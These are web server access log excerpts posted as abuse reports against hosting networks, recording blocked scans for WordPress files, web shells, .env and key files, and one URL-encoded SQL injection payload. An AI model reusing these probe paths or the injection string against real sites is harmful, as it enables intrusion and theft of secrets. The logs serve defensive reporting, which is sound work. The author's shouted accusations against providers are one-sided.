149.102.230.133 website*x.de – – [10/Aug/2025:03:51:18 +0200] „GET /blog/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36“
149.102.230.133 website*x.de – – [10/Aug/2025:03:51:18 +0200] „GET /web/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36“
149.102.230.133 website*x.de – – [10/Aug/2025:03:51:18 +0200] „GET /wordpress/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36“
149.102.230.133 website*x.de – – [10/Aug/2025:03:51:18 +0200] „GET /website/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36“
149.102.230.133 website*x.de – – [10/Aug/2025:03:51:18 +0200] „GET /wp/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36“
149.102.230.133 website*x.de – – [10/Aug/2025:03:51:18 +0200] „GET /news/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36“
149.102.230.133 website*x.de – – [10/Aug/2025:03:51:18 +0200] „GET /2018/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36“
149.102.230.133 website*x.de – – [10/Aug/2025:03:51:18 +0200] „GET /2019/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36“
149.102.230.133 website*x.de – – [10/Aug/2025:03:51:18 +0200] „GET /shop/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36“
149.102.230.133 website*x.de – – [10/Aug/2025:03:51:18 +0200] „GET /wp1/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36“
149.102.230.133 website*x.de – – [10/Aug/2025:03:51:18 +0200] „GET /test/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36“
149.102.230.133 website*x.de – – [10/Aug/2025:03:51:18 +0200] „GET /media/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36“
149.102.230.133 website*x.de – – [10/Aug/2025:03:51:18 +0200] „GET /wp2/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36“
149.102.230.133 website*x.de – – [10/Aug/2025:03:51:18 +0200] „GET /site/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36“
149.102.230.133 website*x.de – – [10/Aug/2025:03:51:18 +0200] „GET /cms/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36“
149.102.230.133 website*x.de – – [10/Aug/2025:03:51:18 +0200] „GET /sito/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36“

AS8075 – Microsoft Corporation – VERY UNSECURE! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@microsoft.com – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! VERY IGNORANT! ABUSE PER EMAIL IS STANDARD!!!
172.192.66.60 website*x.de – – [10/Aug/2025:03:59:16 +0200] „GET /wp-content/plugins/hellopress/wp_filemanager.php HTTP/1.0“ 403 – „-“ „-“
172.192.66.60 website*x.de – – [10/Aug/2025:03:59:17 +0200] „GET /file2.php HTTP/1.0“ 302 – „-“ „-“
172.192.66.60 website*x.de – – [10/Aug/2025:03:59:32 +0200] „GET /file3.php HTTP/1.0“ 302 – „-“ „-“
172.192.66.60 website*x.de – – [10/Aug/2025:03:59:47 +0200] „GET /file4.php HTTP/1.0“ 302 – „-“ „-“
172.192.66.60 website*x.de – – [10/Aug/2025:04:00:02 +0200] „GET /file5.php HTTP/1.0“ 302 – „-“ „-“
172.192.66.60 website*x.de – – [10/Aug/2025:04:00:17 +0200] „GET /file6.php HTTP/1.0“ 302 – „-“ „-“
172.192.66.60 website*x.de – – [10/Aug/2025:04:00:32 +0200] „GET /file7.php HTTP/1.0“ 302 – „-“ „-“
172.192.66.60 website*x.de – – [10/Aug/2025:04:00:47 +0200] „GET /file8.php HTTP/1.0“ 302 – „-“ „-“
172.192.66.60 website*x.de – – [10/Aug/2025:04:01:02 +0200] „GET /file9.php HTTP/1.0“ 302 – „-“ „-“

AS49453 – Global Layer B.V. – VERY IGNORANT! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@global-layer.com – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! VERY IGNORANT!
109.202.99.46 website*x.de – – [10/Aug/2025:04:10:26 +0200] „GET /database_backup.sql HTTP/1.0“ 403 – „-“ „Go-http-client/1.1“
109.202.99.46 website*x.de – – [10/Aug/2025:04:10:26 +0200] „GET /web.config HTTP/1.0“ 403 – „-“ „Go-http-client/1.1“
109.202.99.46 website*x.de – – [10/Aug/2025:04:10:26 +0200] „GET /config.json HTTP/1.0“ 403 – „-“ „Go-http-client/1.1“
109.202.99.46 website*x.de – – [10/Aug/2025:04:10:26 +0200] „GET /docker-compose.yml HTTP/1.0“ 403 – „-“ „Go-http-client/1.1“
109.202.99.46 website*x.de – – [10/Aug/2025:04:10:26 +0200] „GET /.env.production HTTP/1.0“ 403 – „-“ „Go-http-client/1.1“
109.202.99.46 website*x.de – – [10/Aug/2025:04:10:26 +0200] „GET /config.xml HTTP/1.0“ 403 – „-“ „Go-http-client/1.1“
109.202.99.46 website*x.de – – [10/Aug/2025:04:10:26 +0200] „GET /config/production.json HTTP/1.0“ 403 – „-“ „Go-http-client/1.1“
109.202.99.46 website*x.de – – [10/Aug/2025:04:10:26 +0200] „GET /api/.env HTTP/1.0“ 403 – „-“ „Go-http-client/1.1“
109.202.99.46 website*x.de – – [10/Aug/2025:04:10:26 +0200] „GET /phpinfo.php HTTP/1.0“ 302 – „-“ „Go-http-client/1.1“
109.202.99.46 website*x.de – – [10/Aug/2025:04:10:26 +0200] „GET /database.sql HTTP/1.0“ 403 – „-“ „Go-http-client/1.1“
109.202.99.46 website*x.de – – [10/Aug/2025:04:10:26 +0200] „GET /feed HTTP/1.0“ 403 – „-“ „Go-http-client/1.1“
109.202.99.46 website*x.de – – [10/Aug/2025:04:10:26 +0200] „GET /server-status HTTP/1.0“ 403 – „-“ „Go-http-client/1.1“
109.202.99.46 website*x.de – – [10/Aug/2025:04:10:26 +0200] „GET /etc/ssl/private/server.key HTTP/1.0“ 403 – „-“ „Go-http-client/1.1“
… and so on….!!!

MAIL NR. 7, Hacking-Attempts from Sunday!

abuse@virtualine.org

AS214940 – KPROHOST LLC – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@virtualine.org – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! VERY IGNORANT!
198.55.98.211 website*x.de – – [10/Aug/2025:07:48:28 +0200] „GET /.git/config HTTP/1.0“ 403 – „-“ „Go-http-client/1.1“

MAIL NR. 8, Hacking-Attempts from Sunday!

abuse@microsoft.com, msftcs@microsoft.com,azsafety@microsoft.com,google-cloud-compliance@google.com, network-abuse@google.com

AS8075 – Microsoft Corporation – DAILY HACKER-IDIOTS! – VERY UNSECURE! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@microsoft.com – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! VERY IGNORANT! ABUSE PER EMAIL IS STANDARD!!!
172.192.66.60 website*x.com – – [10/Aug/2025:09:33:40 +0200] „GET /wp-content/plugins/hellopress/wp_filemanager.php HTTP/1.0“ 403 – „-“ „-“
172.192.66.60 website*x.com – – [10/Aug/2025:09:33:42 +0200] „GET /file2.php HTTP/1.0“ 302 – „-“ „-“
172.192.66.60 website*x.com – – [10/Aug/2025:09:33:57 +0200] „GET /file3.php HTTP/1.0“ 302 – „-“ „-“
172.192.66.60 website*x.com – – [10/Aug/2025:09:34:12 +0200] „GET /file4.php HTTP/1.0“ 302 – „-“ „-“
172.192.66.60 website*x.com – – [10/Aug/2025:09:34:27 +0200] „GET /file5.php HTTP/1.0“ 302 – „-“ „-“
172.192.66.60 website*x.com – – [10/Aug/2025:09:34:42 +0200] „GET /file6.php HTTP/1.0“ 302 – „-“ „-“
172.192.66.60 website*x.com – – [10/Aug/2025:09:34:57 +0200] „GET /file7.php HTTP/1.0“ 302 – „-“ „-“
172.192.66.60 website*x.com – – [10/Aug/2025:09:35:12 +0200] „GET /file8.php HTTP/1.0“ 302 – „-“ „-“
172.192.66.60 website*x.com – – [10/Aug/2025:09:35:27 +0200] „GET /file9.php HTTP/1.0“ 302 – „-“ „-“

AS396982 – Google LLC – DAILY HACKER-IDIOTS! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
google-cloud-compliance@google.com – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! VERY IGNORANT! ABUSE PER EMAIL IS STANDARD!!!
35.246.123.14 website*x.com – – [10/Aug/2025:09:50:07 +0200] „GET /style.php HTTP/1.0“ 302 20 „www.google.com“ „Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36“
35.246.123.14 website*x.com – – [10/Aug/2025:09:50:12 +0200] „GET /style.php HTTP/1.0“ 302 20 „www.google.com“ „Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36“

MAIL NR. 9, Hacking-Attempts from Sunday!

abuse@microsoft.com, msftcs@microsoft.com,azsafety@microsoft.com

AS8075 – Microsoft Corporation – DAILY HACKER-IDIOTS! – VERY UNSECURE! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@microsoft.com – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! VERY IGNORANT! ABUSE PER EMAIL IS STANDARD!!!
52.169.148.186 website*x.com – – [10/Aug/2025:08:19:09 +0200] „GET /wp-content/plugins/hellopress/wp_filemanager.php HTTP/1.0“ 403 – „-“ „-“
52.169.148.186 website*x.com – – [10/Aug/2025:08:19:09 +0200] „GET /wp-content/plugins/core-plugin/include.php HTTP/1.0“ 403 – „-“ „-“
52.169.148.186 website*x.com – – [10/Aug/2025:08:19:09 +0200] „GET /wp-login.php HTTP/1.0“ 403 – „-“ „-“
52.169.148.186 website*x.com – – [10/Aug/2025:08:19:09 +0200] „GET /bak.php HTTP/1.0“ 302 – „-“ „-“
52.169.148.186 website*x.com – – [10/Aug/2025:08:19:24 +0200] „GET /wp-includes/ID3/about.php HTTP/1.0“ 403 – „-“ „-“
52.169.148.186 website*x.com – – [10/Aug/2025:08:19:24 +0200] „GET /.well-known/cong.php HTTP/1.0“ 403 – „-“ „-“
52.169.148.186 website*x.com – – [10/Aug/2025:08:19:24 +0200] „GET /wp-content/plugins/pwnd/pwnd.php HTTP/1.0“ 403 – „-“ „-“
52.169.148.186 website*x.com – – [10/Aug/2025:08:19:24 +0200] „GET /wp-content/plugins/about.php HTTP/1.0“ 403 – „-“ „-“
52.169.148.186 website*x.com – – [10/Aug/2025:08:19:24 +0200] „GET /wp.php HTTP/1.0“ 302 – „-“ „-“
52.169.148.186 website*x.com – – [10/Aug/2025:08:19:39 +0200] „GET /hoot.php HTTP/1.0“ 302 – „-“ „-“
52.169.148.186 website*x.com – – [10/Aug/2025:08:19:54 +0200] „GET /about.php HTTP/1.0“ 302 – „-“ „-“
52.169.148.186 website*x.com – – [10/Aug/2025:08:20:09 +0200] „GET /admin.php HTTP/1.0“ 302 – „-“ „-“

MAIL NR. 10, Hacking-Attempts from Sunday!

abuse@microsoft.com, msftcs@microsoft.com,azsafety@microsoft.com

MAIL NR. 1, Hacking-Attempts from Saturday!

AS135450 – PT Berkah Solusi Teknologi Informasi – VERY UNSECURE! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@ptbsti.com – NO RESPONSE… NOTHING IN OUR ABUSE EMAILS! VERY IGNORANT!
103.77.107.216 website*x.com – – [09/Aug/2025:01:44:42 +0200] „GET /sftp-config.json HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0“
103.77.107.216 website*x.com – – [09/Aug/2025:01:44:43 +0200] „GET /.vscode/sftp.json HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0“

AS210558 – 1337 Services GmbH – VERY UNSECURE! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@as210558.net – NO RESPONSE… NOTHING IN OUR ABUSE EMAILS! VERY IGNORANT!
2.58.56.61 website*x.com – – [09/Aug/2025:03:21:15 +0200] „POST /ALFA_DATA/alfacgiapi/perl.alfa HTTP/1.0“ 403 – „www.google.com“ „Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36“
2.58.56.61 website*x.com – – [09/Aug/2025:03:21:15 +0200] „POST /wp-plain.php HTTP/1.0“ 302 – „www.google.com“ „Mozilla/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36“
2.58.56.61 website*x.com – – [09/Aug/2025:03:21:15 +0200] „GET / HTTP/1.0“ 403 – „-“ „Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36“
2.58.56.61 website*x.com – – [09/Aug/2025:03:21:15 +0200] „GET /wp-content/themes/seotheme/db.php?u HTTP/1.0“ 403 – „www.google.com“ „Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36“
2.58.56.61 website*x.com – – [09/Aug/2025:03:21:15 +0200] „GET /wp-content/plugins/fix/up.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36“
2.58.56.61 website*x.com – – [09/Aug/2025:03:21:15 +0200] „POST /alfacgiapi/perl.alfa HTTP/1.0“ 403 – „www.google.com“ „Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36“
2.58.56.61 website*x.com – – [09/Aug/2025:03:21:15 +0200] „GET /wp-content/themes/seotheme/db.php?u HTTP/1.0“ 403 – „www.google.com“ „Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36“

AS48693 – Rices Privately owned enterprise – DEMENIN B.V. – VERY UNSECURE AND IGNORANT! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@demenin.net, abuse@ntup.net – NO RESPONSE… NOTHING IN OUR ABUSE EMAILS SINCE MONTHS!!! VERY IGNORANT!!!
194.145.227.125 website*x.com – – [09/Aug/2025:10:02:38 +0200] „GET /wp-content/plugins/ip-logger/chart/ofc_upload_image.php HTTP/1.0“ 403 – „-“ „ALittle Client“

MAIL NR. 2, Hacking-Attempts from Saturday!

abuse@ipxo.com, abuse@contabo.de, noc@contabo.de, sascha.wintz@contabo.de, abuse@cogentco.com,noc@cogentco.com,abuse@microsoft.com, msftcs@microsoft.com,azsafety@microsoft.com

AS51167 – Contabo GmbH – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@contabo.de – NO RESPONSE… NOTHING IN OUR ABUSE EMAILS! VERY IGNORANT!
207.180.254.63 www.website*x.com – – [09/Aug/2025:03:02:48 +0200] „GET /wp-login.php HTTP/1.0“ 403 – „https://www.google.com/“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36“
207.180.254.63 www.website*x.com – – [09/Aug/2025:03:02:48 +0200] „GET /wp-login.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2 Safari/605.1.15“
207.180.254.63 www.website*x.com – – [09/Aug/2025:03:02:48 +0200] „GET /wp-admin/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 11.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36“

AS141995 – Contabo Asia Private Limited – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@cogentco.com – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! VERY IGNORANT!
Here are we have a 403 WITH 5 IP´S but when it´s a 200, this idiots in this networks start to try to hacking!
154.26.128.67 www.website*x.com – – [09/Aug/2025:10:30:47 +0200] „GET / HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36“

MAIL NR. 3, Hacking-Attempts from Saturday!

abuse@microsoft.com, msftcs@microsoft.com,azsafety@microsoft.com, abuse@cogentco.com, report@abuseradar.com,abuse@globaldata-cloud.com

AS174 – Cogent Communications – VERY UNSECURE! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@cogentco.com, report@abuseradar.com – ABUSERADAR=NO RESPONSE… NOTHING IN OUR ABUSE EMAILS! VERY IGNORANT!
151.240.205.203 www.website*x.com – – [09/Aug/2025:04:43:22 +0200] „GET //feed/ HTTP/1.0“ 301 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36“
151.240.205.203 www.website*x.com – – [09/Aug/2025:04:43:23 +0200] „GET //xmlrpc.php?rsd HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36“
151.240.205.203 www.website*x.com – – [09/Aug/2025:04:43:23 +0200] „GET //blog/wp-includes/wlwmanifest.xml HTTP/1.0“ 301 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36“
151.240.205.203 www.website*x.com – – [09/Aug/2025:04:43:24 +0200] „GET //web/wp-includes/wlwmanifest.xml HTTP/1.0“ 301 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36“
151.240.205.203 www.website*x.com – – [09/Aug/2025:04:43:24 +0200] „GET //wordpress/wp-includes/wlwmanifest.xml HTTP/1.0“ 301 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36“
151.240.205.203 www.website*x.com – – [09/Aug/2025:04:43:25 +0200] „GET //wp/wp-includes/wlwmanifest.xml HTTP/1.0“ 301 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36“
151.240.205.203 www.website*x.com – – [09/Aug/2025:04:43:25 +0200] „GET //2020/wp-includes/wlwmanifest.xml HTTP/1.0“ 301 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36“
151.240.205.203 www.website*x.com – – [09/Aug/2025:04:43:26 +0200] „GET //2019/wp-includes/wlwmanifest.xml HTTP/1.0“ 301 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36“
151.240.205.203 www.website*x.com – – [09/Aug/2025:04:43:26 +0200] „GET //2021/wp-includes/wlwmanifest.xml HTTP/1.0“ 301 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36“
151.240.205.203 www.website*x.com – – [09/Aug/2025:04:43:27 +0200] „GET //shop/wp-includes/wlwmanifest.xml HTTP/1.0“ 301 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36“
151.240.205.203 www.website*x.com – – [09/Aug/2025:04:43:28 +0200] „GET //wp1/wp-includes/wlwmanifest.xml HTTP/1.0“ 301 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36“
151.240.205.203 www.website*x.com – – [09/Aug/2025:04:43:28 +0200] „GET //test/wp-includes/wlwmanifest.xml HTTP/1.0“ 301 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36“
151.240.205.203 www.website*x.com – – [09/Aug/2025:04:43:29 +0200] „GET //site/wp-includes/wlwmanifest.xml HTTP/1.0“ 301 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36“
151.240.205.203 www.website*x.com – – [09/Aug/2025:04:43:29 +0200] „GET //cms/wp-includes/wlwmanifest.xml HTTP/1.0“ 301 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36“

AS42624 – Global-Data System IT Corporation – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@globaldata-cloud.com – NO RESPONSE… NOTHING IN OUR ABUSE EMAILS! VERY IGNORANT!
185.196.11.72 website*x.com – – [09/Aug/2025:07:13:12 +0200] „GET //wp-json/wc/store/products/collection-data?calculate_attribute_counts[][taxonomy]=%252522%252529%252520union%252520all%252520select%2525201%25252Ctable%25255fname%252520from%252520information%25255fschema%25252etables%25253B%252500 HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36“

MAIL NR. 4, Hacking-Attempts from Saturday!

abuse@m247.ro, abuse@microsoft.com, msftcs@microsoft.com,azsafety@microsoft.com

AS8075 – Microsoft Corporation – HERE NOW WITH 3 IP´S! – VERY UNSECURE! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@microsoft.com – NO RESPONSE… NOTHING IN OUR ABUSE EMAILS! VERY IGNORANT! ABUSE PER EMAIL IS STANDARD!!!
52.138.197.72 website*x.de – – [09/Aug/2025:04:00:30 +0200] „GET /.alf.php HTTP/1.0“ 302 – „-“ „-“
52.138.197.72 website*x.de – – [09/Aug/2025:04:00:31 +0200] „GET /.bod/.ll/ss.php HTTP/1.0“ 403 – „-“ „-“
52.138.197.72 website*x.de – – [09/Aug/2025:04:00:31 +0200] „GET /.well-known/classwithtostring.php HTTP/1.0“ 403 – „-“ „-“
52.138.197.72 website*x.de – – [09/Aug/2025:04:00:31 +0200] „GET /.well-known/index.php HTTP/1.0“ 403 – „-“ „-“
52.138.197.72 website*x.de – – [09/Aug/2025:04:00:31 +0200] „GET /.well-known/radio.php HTTP/1.0“ 403 – „-“ „-“
52.138.197.72 website*x.de – – [09/Aug/2025:04:00:31 +0200] „GET /10.php HTTP/1.0“ 302 – „-“ „-“
52.138.197.72 website*x.de – – [09/Aug/2025:04:00:31 +0200] „GET /12.php HTTP/1.0“ 302 – „-“ „-“
52.138.197.72 website*x.de – – [09/Aug/2025:04:00:31 +0200] „GET /13k.php HTTP/1.0“ 302 – „-“ „-“
52.138.197.72 website*x.de – – [09/Aug/2025:04:00:32 +0200] „GET /87.php HTTP/1.0“ 302 – „-“ „-“
52.138.197.72 website*x.de – – [09/Aug/2025:04:00:32 +0200] „GET /about.php HTTP/1.0“ 302 – „-“ „-“
52.138.197.72 website*x.de – – [09/Aug/2025:04:00:32 +0200] „GET /about/Geforce.php HTTP/1.0“ 403 – „-“ „-“
52.138.197.72 website*x.de – – [09/Aug/2025:04:00:32 +0200] „GET /about/function.php HTTP/1.0“ 403 – „-“ „-“
52.138.197.72 website*x.de – – [09/Aug/2025:04:00:32 +0200] „GET /admin.php HTTP/1.0“ 302 – „-“ „-“
52.138.197.72 website*x.de – – [09/Aug/2025:04:00:32 +0200] „GET /admin/admin.php HTTP/1.0“ 403 – „-“ „-“
52.138.197.72 website*x.de – – [09/Aug/2025:04:00:32 +0200] „GET /admin/function.php HTTP/1.0“ 403 – „-“ „-“
52.138.197.72 website*x.de – – [09/Aug/2025:04:00:32 +0200] „GET /admin/index.php HTTP/1.0“ 403 – „-“ „-“
52.138.197.72 website*x.de – – [09/Aug/2025:04:00:32 +0200] „GET /adminfuns.php HTTP/1.0“ 302 – „-“ „-“
52.138.197.72 website*x.de – – [09/Aug/2025:04:00:33 +0200] „GET /akc.php HTTP/1.0“ 302 – „-“ „-“
52.138.197.72 website*x.de – – [09/Aug/2025:04:00:33 +0200] „GET /al.php HTTP/1.0“ 302 – „-“ „-“
52.138.197.72 website*x.de – – [09/Aug/2025:04:00:33 +0200] „GET /alfa.php HTTP/1.0“ 302 – „-“ „-“
52.138.197.72 website*x.de – – [09/Aug/2025:04:00:33 +0200] „GET /as.php HTTP/1.0“ 302 – „-“ „-“
52.138.197.72 website*x.de – – [09/Aug/2025:04:00:33 +0200] „GET /asasx.php HTTP/1.0“ 302 – „-“ „-“
52.138.197.72 website*x.de – – [09/Aug/2025:04:00:34 +0200] „GET /assets/images/doc.php HTTP/1.0“ 403 – „-“ „-“
52.138.197.72 website*x.de – – [09/Aug/2025:04:00:34 +0200] „GET /atomlib.php HTTP/1.0“ 302 – „-“ „-“
52.138.197.72 website*x.de – – [09/Aug/2025:04:00:34 +0200] „GET /auth.php HTTP/1.0“ 302 – „-“ „-“
52.138.197.72 website*x.de – – [09/Aug/2025:04:00:34 +0200] „GET /autoload_classmap.php HTTP/1.0“ 302 – „-“ „-“
52.138.197.72 website*x.de – – [09/Aug/2025:04:00:34 +0200] „GET /autoload_classmap/function.php HTTP/1.0“ 403 – „-“ „-“
52.138.197.72 website*x.de – – [09/Aug/2025:04:00:34 +0200] „GET /b.php HTTP/1.0“ 302 – „-“ „-“
… and so on…!!!
+
13.79.223.58 website*x.de – – [09/Aug/2025:04:36:59 +0200] „GET /lock360.php HTTP/1.0“ 302 – „-“ „-“
13.79.223.58 website*x.de – – [09/Aug/2025:04:37:00 +0200] „GET /html.php HTTP/1.0“ 302 – „-“ „-“
13.79.223.58 website*x.de – – [09/Aug/2025:04:37:00 +0200] „GET /ioxi-o.php HTTP/1.0“ 302 – „-“ „-“
